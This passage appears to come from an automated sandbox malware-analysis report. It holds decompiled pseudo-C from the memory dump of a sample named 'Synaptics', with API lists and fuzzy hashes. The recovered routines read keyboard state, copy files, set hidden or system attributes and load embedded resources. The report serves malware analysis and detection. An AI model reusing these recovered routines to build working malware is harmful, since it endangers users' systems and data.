                                                                                                                                                                                                                            					_t39 =  *_t79;
                                                                                                                                                                                                                            					if(_t39 < 0x100 || _t39 > 0x108) {
                                                                                                                                                                                                                            						_t40 =  *_t79;
                                                                                                                                                                                                                            						__eflags = _t40 - 0x200;
                                                                                                                                                                                                                            						if(_t40 < 0x200) {
                                                                                                                                                                                                                            							L30:
                                                                                                                                                                                                                            							__eflags = _t40 - 0xb00b;
                                                                                                                                                                                                                            							if(_t40 == 0xb00b) {
                                                                                                                                                                                                                            								E0043AB1C(_t96, _t79[1], _t40, _t79[2]);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							L32:
                                                                                                                                                                                                                            							return  *((intOrPtr*)( *_t96 - 0x14))();
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						__eflags = _t40 - 0x20a;
                                                                                                                                                                                                                            						if(_t40 > 0x20a) {
                                                                                                                                                                                                                            							goto L30;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						__eflags =  *(_t96 + 0x50) & 0x00000080;
                                                                                                                                                                                                                            						if(( *(_t96 + 0x50) & 0x00000080) != 0) {
                                                                                                                                                                                                                            							L16:
                                                                                                                                                                                                                            							_t46 =  *_t79 - 0x200;
                                                                                                                                                                                                                            							__eflags = _t46;
                                                                                                                                                                                                                            							if(__eflags == 0) {
                                                                                                                                                                                                                            								L21:
                                                                                                                                                                                                                            								_t47 =  *0x49dbcc; // 0x49ebb8
                                                                                                                                                                                                                            								E0045B21C( *_t47, _t79, _t96, __eflags);
                                                                                                                                                                                                                            								goto L32;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_t50 = _t46 - 1;
                                                                                                                                                                                                                            							__eflags = _t50;
                                                                                                                                                                                                                            							if(_t50 == 0) {
                                                                                                                                                                                                                            								L22:
                                                                                                                                                                                                                            								__eflags =  *((char*)(_t96 + 0x5d)) - 1;
                                                                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                                                                            									 *(_t96 + 0x54) =  *(_t96 + 0x54) | 0x00000001;
                                                                                                                                                                                                                            									goto L32;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								return E00403DE8(_t96, __eflags);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_t53 = _t50 - 1;
                                                                                                                                                                                                                            							__eflags = _t53;
                                                                                                                                                                                                                            							if(_t53 == 0) {
                                                                                                                                                                                                                            								 *(_t96 + 0x54) =  *(_t96 + 0x54) & 0x0000fffe;
                                                                                                                                                                                                                            								goto L32;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__eflags = _t53 == 1;
                                                                                                                                                                                                                            							if(_t53 == 1) {
                                                                                                                                                                                                                            								goto L22;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_t55 =  *0x49eb18; // 0x21e12f4
                                                                                                                                                                                                                            							__eflags =  *((char*)(_t55 + 0x20));
                                                                                                                                                                                                                            							if( *((char*)(_t55 + 0x20)) == 0) {
                                                                                                                                                                                                                            								goto L32;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								_t56 =  *0x49eb18; // 0x21e12f4
                                                                                                                                                                                                                            								__eflags =  *(_t56 + 0x1c);
                                                                                                                                                                                                                            								if( *(_t56 + 0x1c) == 0) {
                                                                                                                                                                                                                            									goto L32;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								_t90 =  *0x49eb18; // 0x21e12f4
                                                                                                                                                                                                                            								_t25 = _t90 + 0x1c; // 0x0
                                                                                                                                                                                                                            								__eflags =  *_t79 -  *_t25;
                                                                                                                                                                                                                            								if( *_t79 !=  *_t25) {
                                                                                                                                                                                                                            									goto L32;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								GetKeyboardState( &_v280);
                                                                                                                                                                                                                            								_v20 =  *_t79;
                                                                                                                                                                                                                            								_v16 = E00451924( &_v280);
                                                                                                                                                                                                                            								_v14 = _t79[1];
                                                                                                                                                                                                                            								_v12 = _t79[2];
                                                                                                                                                                                                                            								return E00403DE8(_t96, __eflags);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							goto L21;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t67 = _t40 - 0x203;
                                                                                                                                                                                                                            						__eflags = _t67;
                                                                                                                                                                                                                            						if(_t67 == 0) {
                                                                                                                                                                                                                            							L15:
                                                                                                                                                                                                                            							 *_t79 =  *_t79 - 2;
                                                                                                                                                                                                                            							__eflags =  *_t79;
                                                                                                                                                                                                                            							goto L16;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t68 = _t67 - 3;
                                                                                                                                                                                                                            						__eflags = _t68;
                                                                                                                                                                                                                            						if(_t68 == 0) {
                                                                                                                                                                                                                            							goto L15;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						__eflags = _t68 != 3;
                                                                                                                                                                                                                            						if(_t68 != 3) {
                                                                                                                                                                                                                            							goto L16;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						goto L15;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_v24 = E004519E0(_t96);
                                                                                                                                                                                                                            					if(_v24 == 0) {
                                                                                                                                                                                                                            						goto L32;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t73 =  *((intOrPtr*)( *_v24 + 0xf0))();
                                                                                                                                                                                                                            					if(_t73 == 0) {
                                                                                                                                                                                                                            						goto L32;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_v24 = E004519E0(__eax);
                                                                                                                                                                                                                            					if(_v24 == 0 ||  *((intOrPtr*)(_v24 + 0x250)) == 0) {
                                                                                                                                                                                                                            						goto L4;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t73 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v24 + 0x250)))) + 0x24))();
                                                                                                                                                                                                                            						if(_t73 == 0) {
                                                                                                                                                                                                                            							goto L4;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t73;
                                                                                                                                                                                                                            			}























                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043c331
                                                                                                                                                                                                                            0x0043c338
                                                                                                                                                                                                                            0x0043c346
                                                                                                                                                                                                                            0x0043c34d
                                                                                                                                                                                                                            0x0043c354
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043c360
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043c310
                                                                                                                                                                                                                            0x0043c2a6
                                                                                                                                                                                                                            0x0043c2a6
                                                                                                                                                                                                                            0x0043c2ab
                                                                                                                                                                                                                            0x0043c2b7
                                                                                                                                                                                                                            0x0043c2b7
                                                                                                                                                                                                                            0x0043c2b7
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043c2b7
                                                                                                                                                                                                                            0x0043c2ad
                                                                                                                                                                                                                            0x0043c2ad
                                                                                                                                                                                                                            0x0043c2b0
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043c2b2
                                                                                                                                                                                                                            0x0043c2b5
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043c2b5
                                                                                                                                                                                                                            0x0043c25f
                                                                                                                                                                                                                            0x0043c266
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043c275
                                                                                                                                                                                                                            0x0043c27d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043c283
                                                                                                                                                                                                                            0x0043c212
                                                                                                                                                                                                                            0x0043c219
                                                                                                                                                                                                                            0x0043c220
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043c22e
                                                                                                                                                                                                                            0x0043c23d
                                                                                                                                                                                                                            0x0043c242
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043c242
                                                                                                                                                                                                                            0x0043c220
                                                                                                                                                                                                                            0x0043c38d

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetKeyboardState.USER32(?), ref: 0043C331
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: KeyboardState
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1724228437-0
                                                                                                                                                                                                                            • Opcode ID: 9f2acd7fa3e65c504f9cebf6f4804a4b530c3e7649d8a629da2463b5fec39ead
                                                                                                                                                                                                                            • Instruction ID: 91b3d7ef9cae681235685cdbb9a2033184f7e3317d8ce185dcb9f17e25b61164
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9f2acd7fa3e65c504f9cebf6f4804a4b530c3e7649d8a629da2463b5fec39ead
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1941A131A006158FDB20DBA9C4C86AFB7A1AB0E704F1491A7E801FB3A5C738DD45C79A
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 70%
                                                                                                                                                                                                                            			E00410A04(intOrPtr _a4, signed int* _a8, intOrPtr _a12, char _a16) {
                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                            				char* _v12;
                                                                                                                                                                                                                            				char _v28;
                                                                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                                                                            				signed int _t27;
                                                                                                                                                                                                                            				intOrPtr _t28;
                                                                                                                                                                                                                            				intOrPtr _t41;
                                                                                                                                                                                                                            				intOrPtr _t47;
                                                                                                                                                                                                                            				void* _t54;
                                                                                                                                                                                                                            				signed int* _t56;
                                                                                                                                                                                                                            				void* _t59;
                                                                                                                                                                                                                            				intOrPtr _t63;
                                                                                                                                                                                                                            				void* _t71;
                                                                                                                                                                                                                            				void* _t73;
                                                                                                                                                                                                                            				intOrPtr _t74;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t71 = _t73;
                                                                                                                                                                                                                            				_t74 = _t73 + 0xffffffe8;
                                                                                                                                                                                                                            				_t56 = _a8;
                                                                                                                                                                                                                            				if( *_t56 != 0x400c) {
                                                                                                                                                                                                                            					__eflags = _a4;
                                                                                                                                                                                                                            					if(_a4 != 0) {
                                                                                                                                                                                                                            						_push( &_v28);
                                                                                                                                                                                                                            						L0040F318();
                                                                                                                                                                                                                            						_v12 =  &_v28;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_v12 = 0;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_push(_t71);
                                                                                                                                                                                                                            					_push(0x410af8);
                                                                                                                                                                                                                            					_push( *[fs:eax]);
                                                                                                                                                                                                                            					 *[fs:eax] = _t74;
                                                                                                                                                                                                                            					_t68 =  *_t56;
                                                                                                                                                                                                                            					_t27 =  *_t56 & 0x0000ffff;
                                                                                                                                                                                                                            					__eflags = _t27 - 0x101;
                                                                                                                                                                                                                            					if(__eflags > 0) {
                                                                                                                                                                                                                            						_t28 = _t27 - 0x4009;
                                                                                                                                                                                                                            						__eflags = _t28;
                                                                                                                                                                                                                            						if(_t28 == 0) {
                                                                                                                                                                                                                            							goto L12;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							__eflags = _t28 != 4;
                                                                                                                                                                                                                            							if(_t28 != 4) {
                                                                                                                                                                                                                            								goto L14;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								goto L12;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						if(__eflags == 0) {
                                                                                                                                                                                                                            							L12:
                                                                                                                                                                                                                            							__eflags =  *0x49e810;
                                                                                                                                                                                                                            							if( *0x49e810 != 0) {
                                                                                                                                                                                                                            								 *0x49e810(_v12, _t56, _a12,  &_a16); // executed
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							_t47 = _t27 - 9;
                                                                                                                                                                                                                            							__eflags = _t47;
                                                                                                                                                                                                                            							if(_t47 == 0) {
                                                                                                                                                                                                                            								goto L12;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								__eflags = _t47 == 4;
                                                                                                                                                                                                                            								if(_t47 == 4) {
                                                                                                                                                                                                                            									goto L12;
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									L14:
                                                                                                                                                                                                                            									_t41 = E0041713C(_t68,  &_v8);
                                                                                                                                                                                                                            									__eflags = _t41;
                                                                                                                                                                                                                            									if(_t41 == 0) {
                                                                                                                                                                                                                            										E0041024C(_t59);
                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                            										 *((intOrPtr*)( *_v8 + 0x10))( &_a16, _a12);
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					__eflags = 0;
                                                                                                                                                                                                                            					_pop(_t63);
                                                                                                                                                                                                                            					 *[fs:eax] = _t63;
                                                                                                                                                                                                                            					_push(E00410AFF);
                                                                                                                                                                                                                            					__eflags = _v12;
                                                                                                                                                                                                                            					if(_v12 != 0) {
                                                                                                                                                                                                                            						E00410E14(_a4, _v12);
                                                                                                                                                                                                                            						return E004109E8( &_v28);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t54 = E00410A04(_a4, _t56[2], _a12, _a16);
                                                                                                                                                                                                                            					return _t54;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}



















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: InitVariant
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1927566239-0
                                                                                                                                                                                                                            • Opcode ID: 2624ad7724e2f0b66ccfce44e58a10754ac39f03f5e7eba4765c3010098be67c
                                                                                                                                                                                                                            • Instruction ID: 827efc6faae8abaedf60253a3c6b5d70b674294039054989f6423f3ec82ecb16
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2624ad7724e2f0b66ccfce44e58a10754ac39f03f5e7eba4765c3010098be67c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EB314A71A04308AFDB20DFA8C985AEE77A8EF18390F544467F904D3241D7B89DD0C7A9
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 63%
                                                                                                                                                                                                                            			E00473E4C(intOrPtr __eax, void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, char _a4) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				char _v12;
                                                                                                                                                                                                                            				long _v16;
                                                                                                                                                                                                                            				long _v20;
                                                                                                                                                                                                                            				intOrPtr* _v24;
                                                                                                                                                                                                                            				short _v544;
                                                                                                                                                                                                                            				int _t32;
                                                                                                                                                                                                                            				intOrPtr* _t37;
                                                                                                                                                                                                                            				void* _t47;
                                                                                                                                                                                                                            				intOrPtr _t59;
                                                                                                                                                                                                                            				intOrPtr _t63;
                                                                                                                                                                                                                            				void* _t68;
                                                                                                                                                                                                                            				void* _t69;
                                                                                                                                                                                                                            				intOrPtr _t70;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t68 = _t69;
                                                                                                                                                                                                                            				_t70 = _t69 + 0xfffffde4;
                                                                                                                                                                                                                            				_t47 = __ecx;
                                                                                                                                                                                                                            				_v12 = __edx;
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				E00404E70(_v8);
                                                                                                                                                                                                                            				E00404E70(_v12);
                                                                                                                                                                                                                            				_push(_t68);
                                                                                                                                                                                                                            				_push(0x473f3f);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t70;
                                                                                                                                                                                                                            				E00405920(_v8, 0x104,  &_v544);
                                                                                                                                                                                                                            				_t32 = ExtractIconExW( &_v544, 0,  &_v16,  &_v20, 1); // executed
                                                                                                                                                                                                                            				if(_t32 <= 0) {
                                                                                                                                                                                                                            					__eflags = 0;
                                                                                                                                                                                                                            					_pop(_t59);
                                                                                                                                                                                                                            					 *[fs:eax] = _t59;
                                                                                                                                                                                                                            					_push(E00473F46);
                                                                                                                                                                                                                            					return E004049E4( &_v12, 2);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t37 = E0041DB54(_v12, 1, __edi, 0xffff); // executed
                                                                                                                                                                                                                            					_v24 = _t37;
                                                                                                                                                                                                                            					_push(_t68);
                                                                                                                                                                                                                            					_push(0x473f0b);
                                                                                                                                                                                                                            					_push( *[fs:eax]);
                                                                                                                                                                                                                            					 *[fs:eax] = _t70;
                                                                                                                                                                                                                            					_t72 = _a4;
                                                                                                                                                                                                                            					if(_a4 == 0) {
                                                                                                                                                                                                                            						__eflags = 0;
                                                                                                                                                                                                                            						E00473C54(_v24, _t47, 0, _v16, __edi, __esi, 0); // executed
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						E00473C54(_v24, _t47, 0, _v20, __edi, __esi, _t72);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_pop(_t63);
                                                                                                                                                                                                                            					 *[fs:eax] = _t63;
                                                                                                                                                                                                                            					_push(E00473F12);
                                                                                                                                                                                                                            					return E00403BEC(_v24);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}


















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • ExtractIconExW.SHELL32(?,00000000,00000001,00000000,00000001), ref: 00473EA5
                                                                                                                                                                                                                              • Part of subcall function 00473C54: GetIconInfo.USER32(00000001,?), ref: 00473C87
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Icon$ExtractInfo
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2636241015-0
                                                                                                                                                                                                                            • Opcode ID: acfe7ac13c5a84df64e210da930adc9f86804b3bd4493eba332945d9c9175a33
                                                                                                                                                                                                                            • Instruction ID: 0bafbf8b306303d6ede9b4da2ad8383aa9ac2d38314ed3fdf0608f00bcdd3931
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: acfe7ac13c5a84df64e210da930adc9f86804b3bd4493eba332945d9c9175a33
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 52219875A04208AFDB05DF65DC529EEB7F8EB48304F60847BF508E3690D6386F00DA58
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 39%
                                                                                                                                                                                                                            			E004747D8(char __eax, void* __ebx, void* __edx, void* __esi) {
                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                            				void* __ecx;
                                                                                                                                                                                                                            				CHAR* _t11;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t12;
                                                                                                                                                                                                                            				struct HRSRC__* _t13;
                                                                                                                                                                                                                            				void* _t29;
                                                                                                                                                                                                                            				intOrPtr* _t33;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t37;
                                                                                                                                                                                                                            				void* _t38;
                                                                                                                                                                                                                            				intOrPtr _t41;
                                                                                                                                                                                                                            				void* _t48;
                                                                                                                                                                                                                            				intOrPtr _t51;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t48 = __edx;
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				E00404E70(_v8);
                                                                                                                                                                                                                            				_push(_t51);
                                                                                                                                                                                                                            				_push(0x474878);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t51;
                                                                                                                                                                                                                            				_t11 = E00404E80(_v8);
                                                                                                                                                                                                                            				_t12 =  *0x49e668; // 0x400000
                                                                                                                                                                                                                            				_t13 = FindResourceA(_t12, _t11, 0xa); // executed
                                                                                                                                                                                                                            				if(_t13 == 0) {
                                                                                                                                                                                                                            					E00404A14(_t48, 0x47488c);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t37 =  *0x49e668; // 0x400000
                                                                                                                                                                                                                            					_t33 = E0041E0D0(_t37, 1, 0xa, _v8);
                                                                                                                                                                                                                            					E0040500C(_t48,  *((intOrPtr*)( *_t33))());
                                                                                                                                                                                                                            					_push( *((intOrPtr*)( *_t33))());
                                                                                                                                                                                                                            					_t29 = E00404ED8(_t48);
                                                                                                                                                                                                                            					_pop(_t38);
                                                                                                                                                                                                                            					E0041D8CC(_t33, _t38, _t29);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_pop(_t41);
                                                                                                                                                                                                                            				 *[fs:eax] = _t41;
                                                                                                                                                                                                                            				_push(E0047487F);
                                                                                                                                                                                                                            				return E004049C0( &_v8);
                                                                                                                                                                                                                            			}
















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0047480A
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FindResource
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1635176832-0
                                                                                                                                                                                                                            • Opcode ID: 12d79ed0c0414dd06bbb4c4c1c3812f09eebba2d0f4e2bd5e91d85672a3e2749
                                                                                                                                                                                                                            • Instruction ID: 3aff7a426593e0292f2699da8adb463acbb462f0eeeb319a78e6b77317a5089b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 12d79ed0c0414dd06bbb4c4c1c3812f09eebba2d0f4e2bd5e91d85672a3e2749
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7B117074700204AFD300FBAADC5296AB3EDFB89714B51807AF508E7291DB39DD01875A
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 72%
                                                                                                                                                                                                                            			E00473804(intOrPtr __eax, void* __ebx, void* __ecx, intOrPtr __edx, void* __esi, void* __eflags) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                            				intOrPtr _t51;
                                                                                                                                                                                                                            				void* _t56;
                                                                                                                                                                                                                            				void* _t59;
                                                                                                                                                                                                                            				void* _t61;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t61 = __eflags;
                                                                                                                                                                                                                            				_v20 = 0;
                                                                                                                                                                                                                            				_v16 = 0;
                                                                                                                                                                                                                            				_t56 = __ecx;
                                                                                                                                                                                                                            				_v12 = __edx;
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				E00404E70(_v8);
                                                                                                                                                                                                                            				E00404E70(_v12);
                                                                                                                                                                                                                            				_push(_t59);
                                                                                                                                                                                                                            				_push(0x4738af);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t59 + 0xfffffff0;
                                                                                                                                                                                                                            				if(E00409A48(_v12, _t61) != 0) {
                                                                                                                                                                                                                            					E00404BB8( &_v16, E00404E80(_v12));
                                                                                                                                                                                                                            					E00409A90(_v16, 0x80);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t44 = E00404E80(_v12);
                                                                                                                                                                                                                            				CopyFileA(E00404E80(_v8), _t25, 0); // executed
                                                                                                                                                                                                                            				E00404BB8( &_v20, _t44);
                                                                                                                                                                                                                            				E00409A90(_v20, _t56);
                                                                                                                                                                                                                            				_pop(_t51);
                                                                                                                                                                                                                            				 *[fs:eax] = _t51;
                                                                                                                                                                                                                            				_push(E004738B6);
                                                                                                                                                                                                                            				return E004049E4( &_v20, 4);
                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 0047387B
                                                                                                                                                                                                                              • Part of subcall function 00409A90: SetFileAttributesA.KERNEL32(00000000,00000006,00000000,?,00000000,00476826,?,00476888,?,00476888,00000000,00000000,0000000A,KBHKS,?,00476888), ref: 00409AA2
                                                                                                                                                                                                                              • Part of subcall function 00409A90: GetLastError.KERNEL32(00000000,00000006,00000000,?,00000000,00476826,?,00476888,?,00476888,00000000,00000000,0000000A,KBHKS,?,00476888), ref: 00409AAB
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: File$AttributesCopyErrorLast
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2414470624-0
                                                                                                                                                                                                                            • Opcode ID: 54818fb427acebfbc57ebfdf2a7bc526e9989a66fd20d79204ed49da3fec111c
                                                                                                                                                                                                                            • Instruction ID: 249739c2ab59324f255857505799179cd9e45a8e1fd9df759088737bab44b84f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 54818fb427acebfbc57ebfdf2a7bc526e9989a66fd20d79204ed49da3fec111c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9C1116B0E001099BDB00EFAAD88299EB7F9FF44714F51457BF514B3391DB389E058A98
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 43%
                                                                                                                                                                                                                            			E0047D26C(intOrPtr* __eax, void* __ebx, signed int* __ecx, void* __edx, void* __edi, void* __esi, signed int* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                            				void* _v20;
                                                                                                                                                                                                                            				intOrPtr _v22;
                                                                                                                                                                                                                            				signed short _v24;
